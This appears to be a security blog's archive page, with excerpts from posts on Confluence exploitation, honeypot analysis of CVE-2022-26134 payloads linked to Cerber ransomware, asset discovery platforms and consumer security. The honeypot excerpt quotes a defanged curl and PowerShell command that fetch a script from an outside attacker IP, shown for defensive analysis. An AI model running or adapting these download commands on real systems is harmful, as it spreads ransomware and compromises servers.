Learn to be a SOC Analyst – Confluence and…

The guidance here is also useful with a post on parsing Confluence logs for an RCE using OGNL injection.

Warning – CERBER RANSOMWARE

The contents of this blog if executed could get you ransomwared so maybe be careful (I’ll de-fang some bits so if you are having issues following along fix the fangs, plus the payloads will get taken down)

To support a high levle view here is the rough stages that would occur in a successful deployment by a threat actor against a vulnerable target:

Recon

Find servers with Confluence that aren’t patched.

Send Log4J Exploit with Stage0 payload

Text

Description automatically generated with medium confidence

CVE-2022-26134 – Honeypot Payload Analysis Example

Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:

HTTP Command Executes this:

curl http[:]//202.28.229.174/ap[.]sh?confcurl

This download the following (ap.sh)

$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing

$stealz.Content | Out-File ap.txt

Passive Port Scanners & Internet Asset Discovery Platforms

Useful for a range of defensive and offensive purposes, internet asset search platforms enable a range of activities from:

Research & Trend Analysis
Vulnerability Hunting
Attack Surface Mapping
OSINT

Each has its own interfaces, features, dataset sand styles.

I’ve put together a list of the most popular, there may be more that I haven’t listed.

The CYBER GANG Cookbook

Volume 1

Introduction

I am sitting here, and I need another cup of tea, but I thought I’d start to have a think about what common “CYBER GANGS” look like. This isn’t criminal or non-criminal. But you know there’s some commonality between both. I thought this was fun little thinking exercise to show the duality of life, what digital worlds look like but also to give a glimpse into the mysteryious (its not!) world of cyberz (including crime!)

Stop rushing for “the solution”!

Before you start solutioning

Everyone these days seems to rush towards “the solution”, well as someone who now has few years under their belt, I’d advise people slow down a little and think about their business requirements, outcomes, current state, and constraints. Significantly as well think about how a service will run over a period, not just how to buy it and “fling it into production”.

Real World Consumer Cyber Security

Cyber in the Consumer World

My focus normally is on business to business (B2B) environments and “Enterprise” computing and cyber security. However, I’ve been known to venture into the consumer world from time to time. I wondered whether people would be interested in exploring with me what cyber security in the consumer world look like?

Last week I set on an adventure to see what “hacking” myself might look like. I’m thinking that there might be more to this than a fleeting glance at Instagram hacking and a bit of fun on twitter with alts. Maybe we need to look at consumer security and how/if we have got a good user experience in this space?